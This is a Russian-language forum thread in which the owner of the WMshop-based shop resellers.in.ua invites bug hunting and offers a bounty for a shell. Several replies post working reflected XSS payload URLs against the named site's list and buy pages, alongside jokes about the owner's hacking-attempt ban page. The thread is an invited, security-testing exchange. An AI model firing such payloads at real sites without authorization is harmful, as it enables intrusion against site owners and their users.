Прошу проверить скрипт интернет-магазина resellers.in.ua (http://resellers.in.ua).
Сделан с легкой руки )) очень страшно с ним работать.
Подскажыте основные баги. Я не останусь в долгу.

P.S. Основа скрипта WMshop 13. Кнопка стоит внизу.

admin@resellers.in.ua

Как писалось на многих форумах что WMshop самый дырявый скрипт среди магазинов... я уже месяц ищу доказательства такого предположения.
Да, в самом скрипте были найдены черные хода в админке и не указаны в документации права chmod на некоторые папки.
Хотелось бы узнать по больше про скрипт.

_настолько_ неясную капчу я еще не видел...

Будет завтра TrueType с случайным поворотом, размещением, смещением в 3Д и случайной прозрачностью. Спасибо что напомнили +1
Почему неясная? Потому что скрипт только установил и загадил каптчу как мог )))))

_http://resellers.in.ua/buy_sort.php?com=>'><script>alert(11111111)</script>

http://resellers.in.ua/list_3.php?rid=24</SCRIPT>">'></title><SCRIPT>alert(4)</SCRIPT>

очень хорошо +
красивые Xss )))

мало... может исходник выложыть?

пассивка
http://resellers.in.ua/seller.php?name=%3Cb%3Efff%3C/b%3E

_http://resellers.in.ua/buy.php?tovid=

гг... последний жжет.. в чем уязвимость?
просто в бан-лист попал )))

Вау,
<resellers.in.ua>

Внимание! Зафиксирована попытка взлома магазина RESELLERS.in.ua Ваш IP xxx.xxx.xxx.xxx занесен в журнал и будет в дальнейшем использован для доказательства вашей неправомерной деятельности в отношении RESELLERS.in.ua Если вы случайно попали на эту страницу, то свяжитесь с администратором по email: admin@resellers.in.ua и объясните обстоятельства данного происшествия!

гг... последний жжет.. в чем уязвимость?
просто в бан-лист попал )))
Сообщение уж больно страшное, я уже винт отформатировал, на всякий случай :D

Вау,
<resellers.in.ua>

Внимание! Зафиксирована попытка взлома магазина RESELLERS.in.ua Ваш IP xxx.xxx.xxx.xxx занесен в журнал и будет в дальнейшем использован для доказательства вашей неправомерной деятельности в отношении RESELLERS.in.ua Если вы случайно попали на эту страницу, то свяжитесь с администратором по email: admin@resellers.in.ua и объясните обстоятельства данного происшествия!

А я о чем :D , и ты в бан лист попал... мне его уже чистить надоело )))

кто найдет дырку и сможет предоставить рабочий шел получит от меня 10 Wmz на кошель )

Hello Roleg,
Here are some xss already :
1.
http://resellers.in.ua/list_1.php?rid=41&lst=1'="><script>alert(/XSS-BY-LAEOT/)</script>&sort=date&rv=true
2.
http://resellers.in.ua/list_3.php?rid=200'="><script>alert(/XSS-BY-LAEOT/)</script>&ps=0
I want to test your site but I don't have a WM - идентификатор (so I can't make an account).
Do you have a test account for me?

Hello Roleg,
Here are some xss already :
1.
http://resellers.in.ua/list_1.php?rid=41&lst=1'="><script>alert(/XSS-BY-LAEOT/)</script>&sort=date&rv=true
2.
http://resellers.in.ua/list_3.php?rid=200'="><script>alert(/XSS-BY-LAEOT/)</script>&ps=0
I want to test your site but I don't have a WM - идентификатор (so I can't make an account).
Do you have a test account for me?

My apologies, for Americans the given kind of payment translations does not roll. And xss me do not interest.

кто найдет дырку и сможет предоставить рабочий шел получит от меня 10 Wmz на кошель )


деньги зло. :( если будет shell ты его не получишь ;)

деньги зло. :( если будет shell ты его не получишь ;)

гг) да, зло... но я же как лучше хочу ;)

А!!! Убери пост с логами, бессовестный ты человек!! :)

А!!! Убери пост с логами, бессовестный ты человек!! :)

кто ж с реальным айпи ходит... :) мой сайт же не на моем хостинге.. :D